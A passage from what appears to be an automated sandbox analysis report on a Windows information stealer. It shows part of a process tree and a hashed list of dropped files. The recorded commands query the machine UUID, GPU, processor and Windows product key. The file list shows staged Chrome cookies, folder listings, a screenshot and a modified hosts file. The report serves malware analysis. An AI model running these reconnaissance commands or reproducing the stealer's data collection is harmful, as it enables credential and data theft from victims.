                                                                                wmic csproduct get uuid
                                                                                4⤵
                                                                                  PID:2028
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                3⤵
                                                                                  PID:636
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                    4⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:2264
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                  3⤵
                                                                                    PID:4664
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic path win32_VideoController get name
                                                                                      4⤵
                                                                                      • Detects videocard installed
                                                                                      PID:720
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                    3⤵
                                                                                      PID:928
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4472
                                                                                • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                  C:\Windows\System32\WaaSMedicAgent.exe bae49630c4baf21dd5fd4751978efae9 ycKq0CCjZkCUWt7cHbbElw.0.1.0.0.0
                                                                                  1⤵
                                                                                    PID:3256
                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                    1⤵
                                                                                      PID:424
                                                                                    • C:\Windows\system32\backgroundTaskHost.exe
                                                                                      "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                      1⤵
                                                                                        PID:4108
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                        1⤵
                                                                                          PID:3784

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                                                          SHA1

                                                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                          SHA256

                                                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                          SHA512

                                                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          944B

                                                                                          MD5

                                                                                          62623d22bd9e037191765d5083ce16a3

                                                                                          SHA1

                                                                                          4a07da6872672f715a4780513d95ed8ddeefd259

                                                                                          SHA256

                                                                                          95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                                                                                          SHA512

                                                                                          9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          64B

                                                                                          MD5

                                                                                          6152731d26b7b68ab6912b8690244de5

                                                                                          SHA1

                                                                                          de20d9156b870de2e89bc0357a268bbb1cef70f6

                                                                                          SHA256

                                                                                          b1029fb89566cfffff357bb4eba4e4b93c5710e01a1303955fb7b9d39d999e52

                                                                                          SHA512

                                                                                          24edece1a95f35d5cd58655be72c7a9afae43e18c8ebfd985a517f7e614c35409e39cd929c8ad2ad320700be446f3f51381b4cbc1f6fcd443bba63c06c0ecc67

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          04f1df0338245997fbd9de3f1432c948

                                                                                          SHA1

                                                                                          eae002ab55e905f17bc0aef0430c048d8ac5954b

                                                                                          SHA256

                                                                                          a3832fb37c0dc36e5ee08352fc7dfbd0eb807ec95a595581016c6d25d0fcdd6f

                                                                                          SHA512

                                                                                          46f3cf95e78f0ab8a8c47b0bfcf407c3b7cdedf4dadbcc7b93507496c2d005879e99b06c9edd1b4b5257b077532f69ef42b58b14fdbfca8f4ff20fc6e92bfacc

                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          88be3bc8a7f90e3953298c0fdbec4d72

                                                                                          SHA1

                                                                                          f4969784ad421cc80ef45608727aacd0f6bf2e4b

                                                                                          SHA256

                                                                                          533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

                                                                                          SHA512

                                                                                          4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\RES98B6.tmp

                                                                                          Filesize

                                                                                          1KB

                                                                                          MD5

                                                                                          22d4b5d004f94c4bfc29708c9791e6f8

                                                                                          SHA1

                                                                                          883c4a5228a1eedd42b95b6069ed94911f7a22b7

                                                                                          SHA256

                                                                                          169da198224a8009b77af6192c784a6c6ddf925ce4bb08179d4d4d31d0752d10

                                                                                          SHA512

                                                                                          c0525a2efdb8070bb0976a1d8874dd9ae0f48768d3437e45cff3ae1fbea48401b77c920496a0954c996f0ba38e8342d1d1a481c49a2b8eee6def286f1d0e5c91

                                                                                        • C:\Users\Admin\AppData\Local\Temp\Tmf8l.zip

                                                                                          Filesize

                                                                                          421KB

                                                                                          MD5

                                                                                          7c251c6e1c1b999fb48a0d6f4b733c24

                                                                                          SHA1

                                                                                          dc0a6d82544d8f94be820d73e3abb160358583f3

                                                                                          SHA256

                                                                                          aa83230b2f167d2733d48ab4a52f1f5756f359444cda829ea956843a2657b98d

                                                                                          SHA512

                                                                                          c4aefffc11cdfb5e1afbafa3110b9adff7cb030f1dd02dee51ca172b0055a0484dd32e8815a33e4493a719e5a257adb073ff6c9841405c0a3a64e76c2985be89

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\VCRUNTIME140.dll

                                                                                          Filesize

                                                                                          116KB

                                                                                          MD5

                                                                                          be8dbe2dc77ebe7f88f910c61aec691a

                                                                                          SHA1

                                                                                          a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                                                          SHA256

                                                                                          4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                                                          SHA512

                                                                                          0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\_bz2.pyd

                                                                                          Filesize

                                                                                          48KB

                                                                                          MD5

                                                                                          adaa3e7ab77129bbc4ed3d9c4adee584

                                                                                          SHA1

                                                                                          21aabd32b9cbfe0161539454138a43d5dbc73b65

                                                                                          SHA256

                                                                                          a1d8ce2c1efaa854bb0f9df43ebccf861ded6f8afb83c9a8b881904906359f55

                                                                                          SHA512

                                                                                          b73d3aba135fb5e0d907d430266754da2f02e714264cd4a33c1bfdeda4740bbe82d43056f1a7a85f4a8ed28cb7798693512b6d4cdb899ce65b6d271cf5e5e264

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\_ctypes.pyd

                                                                                          Filesize

                                                                                          59KB

                                                                                          MD5

                                                                                          0f090d4159937400db90f1512fda50c8

                                                                                          SHA1

                                                                                          01cbcb413e50f3c204901dff7171998792133583

                                                                                          SHA256

                                                                                          ae6512a770673e268554363f2d1d2a202d0a337baf233c3e63335026d223be31

                                                                                          SHA512

                                                                                          151156a28d023cf68fd38cbecbe1484fc3f6bf525e7354fcced294f8e479e07453fd3fc22a6b8d049ddf0ad6306d2c7051ece4e7de1137578541a9aabefe3f12

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\_decimal.pyd

                                                                                          Filesize

                                                                                          107KB

                                                                                          MD5

                                                                                          a592ba2bb04f53b47d87b4f7b0c8b328

                                                                                          SHA1

                                                                                          ca8c65ab0aab0f98af8cc1c1cf31c9744e56a33c

                                                                                          SHA256

                                                                                          19fe4a08b0b321ff9413da88e519f4a4a4510481605b250f2906a32e8bb14938

                                                                                          SHA512

                                                                                          1576fdc90d8678da0dab8253fdd8ec8b3ce924fa392f35d8c62207a85c31c26dae5524e983e97872933538551cbef9cd4ba9206bcd16f2ae0858ab11574d09e0

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\_hashlib.pyd

                                                                                          Filesize

                                                                                          35KB

                                                                                          MD5

                                                                                          4dd4c7d3a7b954a337607b8b8c4a21d1

                                                                                          SHA1

                                                                                          b6318b830d73cbf9fa45be2915f852b5a5d81906

                                                                                          SHA256

                                                                                          926692fcecdb7e65a14ac0786e1f58e880ea8dae7f7bb3aa7f2c758c23f2af70

                                                                                          SHA512

                                                                                          dab02496c066a70a98334e841a0164df1a6e72e890ce66be440b10fdeecdfe7b8d0ec39d1af402ae72c8aa19763c92dd7404f3a829c9fdcf871c01b1aed122e1

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\_lzma.pyd

                                                                                          Filesize

                                                                                          86KB

                                                                                          MD5

                                                                                          17082c94b383bca187eb13487425ec2c

                                                                                          SHA1

                                                                                          517df08af5c283ca08b7545b446c6c2309f45b8b

                                                                                          SHA256

                                                                                          ddbfef8da4a0d8c1c8c24d171de65b9f4069e2edb8f33ef5dfecf93cb2643bd4

                                                                                          SHA512

                                                                                          2b565d595e9a95aefae396fc7d66ee0aeb9bfe3c23d64540ba080ba39a484ab1c50f040161896cca6620c182f0b02a9db677dab099dca3cae863e6e2542bb12c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\_queue.pyd

                                                                                          Filesize

                                                                                          26KB

                                                                                          MD5

                                                                                          97cc5797405f90b20927e29867bc3c4f

                                                                                          SHA1

                                                                                          a2e7d2399cca252cc54fc1609621d441dff1ace5

                                                                                          SHA256

                                                                                          fb304ca68b41e573713abb012196ef1ae2d5b5e659d846bbf46b1f13946c2a39

                                                                                          SHA512

                                                                                          77780fe0951473762990cbef056b3bba36cda9299b1a7d31d9059a792f13b1a072ce3ab26d312c59805a7a2e9773b7300b406fd3af5e2d1270676a7862b9ca48

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\_socket.pyd

                                                                                          Filesize

                                                                                          44KB

                                                                                          MD5

                                                                                          f52c1c015fb147729a7caab03b2f64f4

                                                                                          SHA1

                                                                                          8aebc2b18a02f1c6c7494271f7f9e779014bee31

                                                                                          SHA256

                                                                                          06d91ac02b00a29180f4520521de2f7de2593dd9c52e1c2b294e717c826a1b7d

                                                                                          SHA512

                                                                                          8ab076c551f0a6ffe02c26b4f0fbb2ea7756d4650fe39f53d7bd61f4cb6ae81460d46d8535c89c6d626e7c605882b39843f7f70dd50e9daf27af0f8cadd49c0f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\_sqlite3.pyd

                                                                                          Filesize

                                                                                          57KB

                                                                                          MD5

                                                                                          37a88a19bb1de9cf33141872c2c534cb

                                                                                          SHA1

                                                                                          a9209ec10af81913d9fd1d0dd6f1890d275617e8

                                                                                          SHA256

                                                                                          cca0fbe5268ab181bf8afbdc4af258d0fbd819317a78ddd1f58bef7d2f197350

                                                                                          SHA512

                                                                                          3a22064505b80b51ebaa0d534f17431f9449c8f2b155ec794f9c4f5508470576366ed3ba5d2de7ddf1836c6e638f26cad8cb0cc496daf30ee38ca97557238733

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\_ssl.pyd

                                                                                          Filesize

                                                                                          66KB

                                                                                          MD5

                                                                                          34402efc9a34b91768cf1280cc846c77

                                                                                          SHA1

                                                                                          20553a06fe807c274b0228ec6a6a49a11ec8b7c1

                                                                                          SHA256

                                                                                          fe52c34028c5d62430ea7a9be034557ccfecdddda9c57874f2832f584fedb031

                                                                                          SHA512

                                                                                          2b8a50f67b5d29db3e300bc0dd670dad0ba069afa9acf566cad03b8a993a0e49f1e28059737d3b21cef2321a13eff12249c80fa46832939d2bf6d8555490e99c

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\base_library.zip

                                                                                          Filesize

                                                                                          1.3MB

                                                                                          MD5

                                                                                          fe165df1db950b64688a2e617b4aca88

                                                                                          SHA1

                                                                                          71cae64d1edd9931ef75e8ef28e812e518b14dde

                                                                                          SHA256

                                                                                          071241ac0fd6e733147a71625de5ead3d7702e73f8d1cbebf3d772cbdce0be35

                                                                                          SHA512

                                                                                          e492a6278676ef944363149a503c7fade9d229bddce7afa919f5e72138f49557619b0bdba68f523fffe7fbca2ccfd5e3269355febaf01f4830c1a4cc67d2e513

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\blank.aes

                                                                                          Filesize

                                                                                          109KB

                                                                                          MD5

                                                                                          a8a0429073a407485d8a83cb11a12711

                                                                                          SHA1

                                                                                          9a708552040cc1f1d577ed9763a58618974df7dc

                                                                                          SHA256

                                                                                          8bd7e28f77be53a42016b5cfdf2581c337540d223cf5171af29c8f566c4bc0d7

                                                                                          SHA512

                                                                                          08ed0a6ce752bed79d49c2476d6d72fa5bac67dabc2003879184689029bec6811ec26e9ae64d7e5580254f52868ffc483c810be892a5a873937ec909f2c0d719

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\libcrypto-3.dll

                                                                                          Filesize

                                                                                          1.6MB

                                                                                          MD5

                                                                                          8377fe5949527dd7be7b827cb1ffd324

                                                                                          SHA1

                                                                                          aa483a875cb06a86a371829372980d772fda2bf9

                                                                                          SHA256

                                                                                          88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

                                                                                          SHA512

                                                                                          c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\libffi-8.dll

                                                                                          Filesize

                                                                                          29KB

                                                                                          MD5

                                                                                          08b000c3d990bc018fcb91a1e175e06e

                                                                                          SHA1

                                                                                          bd0ce09bb3414d11c91316113c2becfff0862d0d

                                                                                          SHA256

                                                                                          135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

                                                                                          SHA512

                                                                                          8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\libssl-3.dll

                                                                                          Filesize

                                                                                          221KB

                                                                                          MD5

                                                                                          b2e766f5cf6f9d4dcbe8537bc5bded2f

                                                                                          SHA1

                                                                                          331269521ce1ab76799e69e9ae1c3b565a838574

                                                                                          SHA256

                                                                                          3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

                                                                                          SHA512

                                                                                          5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\python312.dll

                                                                                          Filesize

                                                                                          1.7MB

                                                                                          MD5

                                                                                          6f7c42579f6c2b45fe866747127aef09

                                                                                          SHA1

                                                                                          b9487372fe3ed61022e52cc8dbd37e6640e87723

                                                                                          SHA256

                                                                                          07642b6a3d99ce88cff790087ac4e2ba0b2da1100cf1897f36e096427b580ee5

                                                                                          SHA512

                                                                                          aadf06fd6b4e14f600b0a614001b8c31e42d71801adec7c9c177dcbb4956e27617fa45ba477260a7e06d2ca4979ed5acc60311258427ee085e8025b61452acec

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\rar.exe

                                                                                          Filesize

                                                                                          615KB

                                                                                          MD5

                                                                                          9c223575ae5b9544bc3d69ac6364f75e

                                                                                          SHA1

                                                                                          8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                          SHA256

                                                                                          90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                          SHA512

                                                                                          57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\rarreg.key

                                                                                          Filesize

                                                                                          456B

                                                                                          MD5

                                                                                          4531984cad7dacf24c086830068c4abe

                                                                                          SHA1

                                                                                          fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                          SHA256

                                                                                          58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                          SHA512

                                                                                          00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\select.pyd

                                                                                          Filesize

                                                                                          25KB

                                                                                          MD5

                                                                                          9a59688220e54fec39a6f81da8d0bfb0

                                                                                          SHA1

                                                                                          07a3454b21a831916e3906e7944232512cf65bc1

                                                                                          SHA256

                                                                                          50e969e062a80917f575af0fe47c458586ebce003cf50231c4c3708da8b5f105

                                                                                          SHA512

                                                                                          7cb7a039a0a1a7111c709d22f6e83ab4cb8714448daddb4d938c0d4692fa8589baa1f80a6a0eb626424b84212da59275a39e314a0e6ccaae8f0be1de4b7b994e

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\sqlite3.dll

                                                                                          Filesize

                                                                                          644KB

                                                                                          MD5

                                                                                          de562be5de5b7f3a441264d4f0833694

                                                                                          SHA1

                                                                                          b55717b5cd59f5f34965bc92731a6cea8a65fd20

                                                                                          SHA256

                                                                                          b8273963f55e7bf516f129ac7cf7b41790dffa0f4a16b81b5b6e300aa0142f7e

                                                                                          SHA512

                                                                                          baf1fbdd51d66ea473b56c82e181582bf288129c7698fc058f043ccfbcec1a28f69d89d3cfbfee77a16d3a3fd880b3b18fd46f98744190d5b229b06cf07c975a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43002\unicodedata.pyd

                                                                                          Filesize

                                                                                          296KB

                                                                                          MD5

                                                                                          2730c614d83b6a018005778d32f4faca

                                                                                          SHA1

                                                                                          611735e993c3cc73ecccb03603e329d513d5678a

                                                                                          SHA256

                                                                                          baa76f6fd87d7a79148e32d3ae38f1d1fe5a98804b86e636902559e87b316e48

                                                                                          SHA512

                                                                                          9b391a62429cd4c40a34740ddb04fa4d8130f69f970bb94fa815485b9da788bca28681ec7d19e493af7c99a2f3bf92c3b53339ef43ad815032d4991f99cc8c45

                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ufwcogs.b1h.ps1

                                                                                          Filesize

                                                                                          60B

                                                                                          MD5

                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                          SHA1

                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                          SHA256

                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                          SHA512

                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                        • C:\Users\Admin\AppData\Local\Temp\ykgudnrt\ykgudnrt.dll

                                                                                          Filesize

                                                                                          4KB

                                                                                          MD5

                                                                                          f29a7f8f37de6cf9644899fa5dc17286

                                                                                          SHA1

                                                                                          60b8f0f938252bda42d257d5c8d5056655ac4338

                                                                                          SHA256

                                                                                          69e4352b066f423d526323e3423b48cc40b817dbf7b3bc8c75d24fc54bdc75ec

                                                                                          SHA512

                                                                                          ddf921181d75204ae62c4f047ef91c777b00d762151ed0942a00d260c916bb54a1ed359e8381fb854b6c5fdf31b4c649e509fdb1da976d5513886126ca12af13

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \Credentials\Chrome\Chrome Cookies.txt

                                                                                          Filesize

                                                                                          258B

                                                                                          MD5

                                                                                          5b1ac2611adef600558e598e952af7e6

                                                                                          SHA1

                                                                                          517d4387aa9b0e8bfc996f81c52ef461b4146d45

                                                                                          SHA256

                                                                                          634722acb116b633bd6cb724c6b46468f5426167f8b6199ad3b62a6f1a537555

                                                                                          SHA512

                                                                                          ff1286671fac27096c12b5a5d2d3c36f3738c9c5a3d754a6a7ac8a436ac1cc74572daf4c1ee46d18bc2129549a6deafba25469dc2717db2412dd744d93a92337

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \Directories\Desktop.txt

                                                                                          Filesize

                                                                                          682B

                                                                                          MD5

                                                                                          408c3dc797f2b6b44debd1d974d77978

                                                                                          SHA1

                                                                                          e78c87f2d783461c96282712e27d10a7acb1fa87

                                                                                          SHA256

                                                                                          6eb270a3e4650d582c4d7d0ae1d762e456a07a3054dcc941aa512bc458d28ac1

                                                                                          SHA512

                                                                                          d19378bf6c266ef5093cebcc79c23954923196f17c8009ff46a28c0f2164a3790289a118fbefa3d97635954538aad26baf7d6341ed9bfae5e4072ec6d94ca6b5

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \Directories\Documents.txt

                                                                                          Filesize

                                                                                          833B

                                                                                          MD5

                                                                                          f969a21ad24afea9005d41412f1ba75e

                                                                                          SHA1

                                                                                          35422841826316a5f88c0f69ae86d316e7d05e52

                                                                                          SHA256

                                                                                          aa57884a7f612d94e7f6e520ad7e921951c056742da5fa2d72ae8eea3a861a18

                                                                                          SHA512

                                                                                          b30a1aeb3a7276e8fde16e85ace62c1b7218c36c1d9756817f1d9470f85ef13ad94c3d4b8781f17e057128dd797124b1258d3417c1b35ece34cad19cceda2831

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \Directories\Downloads.txt

                                                                                          Filesize

                                                                                          761B

                                                                                          MD5

                                                                                          5a478278e757a1313a6d093e90ea1abc

                                                                                          SHA1

                                                                                          a2a106ee815f10e3a5a0256d4c16f30dd8279981

                                                                                          SHA256

                                                                                          574f867364ad7f90239d7e5cb3cf12cd2ad070cfec33cfdddebca063939be5e5

                                                                                          SHA512

                                                                                          ce968ded475538d6b1ea04f437d09209bb623465e476558f98d717303821f54d236789e183022b13be96a46597f2047ab1ba5b24d6ef8ed97554f9451e5a0d60

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \Directories\Music.txt

                                                                                          Filesize

                                                                                          844B

                                                                                          MD5

                                                                                          0f797de921e6760227334890853b38bb

                                                                                          SHA1

                                                                                          178daf8e3bff66256e3ec4b807f9613e6e1bc075

                                                                                          SHA256

                                                                                          0c10514ded9d23bb299f36ae7f85a3930fc5aa389457287154e18c173f18209b

                                                                                          SHA512

                                                                                          d7c6a382d836242fcab8e0a34ce5fe92442cc6f716b9e44197d15a2f06128a367ae8a4fcb80f3df2052a02bd90eede8530d5f4fc818d8cf42ed0f80538eb5cc2

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \Directories\Pictures.txt

                                                                                          Filesize

                                                                                          423B

                                                                                          MD5

                                                                                          6fc6baace428ff52e8ff87e76352959b

                                                                                          SHA1

                                                                                          317176a5e416bf424c2df3d520a915fb11906f2b

                                                                                          SHA256

                                                                                          43bc2ed2a50c8d7c9d5fce5f7eeab2e7fbf03d06f602dbf5a4c68049fb828b31

                                                                                          SHA512

                                                                                          285430f571036d88303098a2dfe5a7fb7e2541f7e4905198cfb4db0893c9d43c3bd6ebf61bb087e906356915c40ff9ecd354b12becf6f0359cc68df18fa21c7d

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \Directories\Videos.txt

                                                                                          Filesize

                                                                                          30B

                                                                                          MD5

                                                                                          e140e10b2b43ba6f978bee0aa90afaf7

                                                                                          SHA1

                                                                                          bbbeb7097ffa9c2daa3206b3f212d3614749c620

                                                                                          SHA256

                                                                                          c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

                                                                                          SHA512

                                                                                          df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \Display (1).png

                                                                                          Filesize

                                                                                          417KB

                                                                                          MD5

                                                                                          37aeaecc2e60f7d22899788acd3d31df

                                                                                          SHA1

                                                                                          dd78431fc2bc433da43fefbe8d3b8d336481c7f9

                                                                                          SHA256

                                                                                          9c439e4e060e539046e4ad08adf0d91ab58c4a0ffdc5e72fd0a6f931c024217d

                                                                                          SHA512

                                                                                          6a11f3ada59f1f38fe8cf01aabad96bf9dc049cde758a5fffed2dadedeea2bfc84d48e5f422b1dc533cec9dcea99fd494f0c42a67333e0a69d977e56efaac09a

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \System\MAC Addresses.txt

                                                                                          Filesize

                                                                                          232B

                                                                                          MD5

                                                                                          c1cdff7eeb0f990561b684358dc996a0

                                                                                          SHA1

                                                                                          38364ccc8f13af3291ecd1e2fada8677df5310a9

                                                                                          SHA256

                                                                                          9c382bbe440bba8e70ca82831652aff91a05eb974e51ac32723ac38e6182c5ad

                                                                                          SHA512

                                                                                          8fb6de96f34fbad24204511277a7cc00d98f76400a63082dc3079071d0b1de5c62571cfb02a850fb6623f23282cf275d581d9901ff7e77b91ae6b26c3a118844

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \System\System Info.txt

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          1ac37c0d58e8bbb10dba13d81c4e2352

                                                                                          SHA1

                                                                                          794082dd1f418dc0334bc0f2e748ba214ed87639

                                                                                          SHA256

                                                                                          51b6c268fe11f7ad7035a2da23a3fd2df684c89152baca1ee2c752a5cf99377e

                                                                                          SHA512

                                                                                          4c974598507526569e5019707c719af63b8ec62452d5fdc4bfc861a929bc1f8d25f2ca364ca9c615618f69a6b73a2500305ce00e5e48e9da33ba102da0a0b9c4

                                                                                        • C:\Users\Admin\AppData\Local\Temp\‍‌ ‎   ‍  \System\Task List.txt

                                                                                          Filesize

                                                                                          12KB

                                                                                          MD5

                                                                                          7c0a205625cfb01e53e7ce56471aff18

                                                                                          SHA1

                                                                                          ca2c73e26785004bd76c46bc69711ac8048f8d98

                                                                                          SHA256

                                                                                          c44a3d91d8015ebb2f313c54c1bb23d4f5fdabc6620c5832c74317ad5f9fc4e7

                                                                                          SHA512

                                                                                          03e1f66d4c292da61c2aeef43eb6ec4b9fd59d02d2c27dcb3823ff3c9815a13f8124b54a11f8da6112e7facdf2daf186b4541d39f9b0515110fd59636c0e3b74

                                                                                        • C:\Windows\System32\drivers\etc\hosts

                                                                                          Filesize

                                                                                          2KB

                                                                                          MD5

                                                                                          f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                          SHA1

                                                                                          e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                          SHA256

                                                                                          a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                          SHA512

                                                                                          c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\ykgudnrt\CSC4E3C41FEE175468FAEB32037EEC785FC.TMP

                                                                                          Filesize

                                                                                          652B

                                                                                          MD5

                                                                                          65027eda49817570ae6b8fba8ad8fc5a

                                                                                          SHA1

                                                                                          fff467f44ba6a25829605a371c0051fb5a017f0e

                                                                                          SHA256

                                                                                          250877131fbec570cb2c815be550b99ffe782bc461be60e8128fb899cd461b1b

                                                                                          SHA512

                                                                                          ddfc01731599f883a00f3c36aa5c93d36538c401778fcef19a1df4557635f6f7087a49ccf2542b4727624e91ddb5aece261b1c5b491d7d8407d80eb4ef3e576f

                                                                                        • \??\c:\Users\Admin\AppData\Local\Temp\ykgudnrt\ykgudnrt.0.cs

                                                                                          Filesize

                                                                                          1004B

                                                                                          MD5

                                                                                          c76055a0388b713a1eabe16130684dc3

                                                                                          SHA1

                                                                                          ee11e84cf41d8a43340f7102e17660072906c402

                                                                                          SHA256

